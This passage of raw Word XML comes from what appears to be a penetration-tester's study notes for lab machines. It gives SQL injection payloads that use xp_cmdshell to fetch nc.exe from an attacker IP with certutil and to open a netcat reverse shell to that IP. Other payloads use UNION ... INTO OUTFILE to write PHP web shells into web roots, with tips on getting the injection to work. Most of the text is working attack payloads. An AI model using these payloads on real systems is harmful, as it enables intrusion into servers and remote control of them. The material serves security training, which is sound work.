      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can try using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to see if the command execution worked, and see if you can reach your Kali from victim (tested this on Medtech .121 and it works)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001779">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1425"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1425"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC xp_cmdshell 'ping -n 3 192.168.45.232';--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's possible that the command execution worked but you get no response on the tcpdump. This is because the victim machine might be in a different subnet or not allowed to access Kali IP. So to see if command execution worked, you can try pinging localhost and seeing if it stalls. If it stalls, then command execution works. Now, as shown in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-B .148</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, try sending a reverse shell to a pivot which forwards the rev shell back to you. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC xp_cmdshell 'ping -n 6 127.0.0.1';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001780">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';EXEC xp_cmdshell 'certutil -urlcache -f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.45.232:80/nc.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\windows\temp\nc.exe';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001781">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This puts nc.exe inside of the target machine. Replace nc.exe with nc64.exe if it's a 64 bit system. Or try both in case you don't know. And nc.exe works with 64-bit system sometimes too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001782">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001783">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';EXEC xp_cmdshell 'C:\windows\temp\nc.exe 192.168.45.232 80 -e cmd.exe';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001784">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1418"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes the reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001785">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001786">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001787">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001788">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001789">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wbedofmw5idy" w:id="193"/>
      <w:bookmarkEnd w:id="193"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enabling command execution with xp_cmdshell through mssql client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(only works for mssql)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX-B .148</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we had access to mssql client, and we enabled command execution while inside of it to send a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information can be found in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get command execution in mssql after you are sysadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section of mssql, but it's basically the same as the stuff above but you just run those commands inside of the client now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e3hj9cko0o0f" w:id="194"/>
      <w:bookmarkEnd w:id="194"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading web shell through sql injection (through UNION-based payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001790">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001791">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 10.3.1. Manual Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001792">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="537"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT "&lt;?php system($_GET['cmd']);?&gt;", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001793">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001794">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have LFI, then you can put the rev shell anywhere, like /dev/shm or /tmp and then access rev shell using LFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001795">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001796">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The follow is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId473">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hawat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797">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001798">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pebbles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice down below, we saw an exploit that gave us SQL injection but it was based on command injection, so we didn't have to escape any quotes or anything like that. It's pretty uncommon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001799">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId474">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hawat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, in the real-world, we often have to use single quotes and a UNION-based payload in order to escape the first original SELECT statement and use our own in order to do something like uploading web shell. We can see this down here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="722"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select '&lt;?php echo system($_REQUEST["cmd"]); ?&gt;' into outfile </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'/srv/http/cmd.php' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found that the root web directory was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/http/cmd.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">by looking at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace it with whatever your root web directory is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$_REQUEST is a superglobal that merges GET, POST, and COOKIE variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this is a union payload, you need to find the number of columns of the original SELECT statement. Down below, we have the source code and can see the original SELECT statement only queries one column, so we are fine here. But in general, you would have to find the exact number of columns. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This technique can be seen in the UNION-based SQL injection section</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
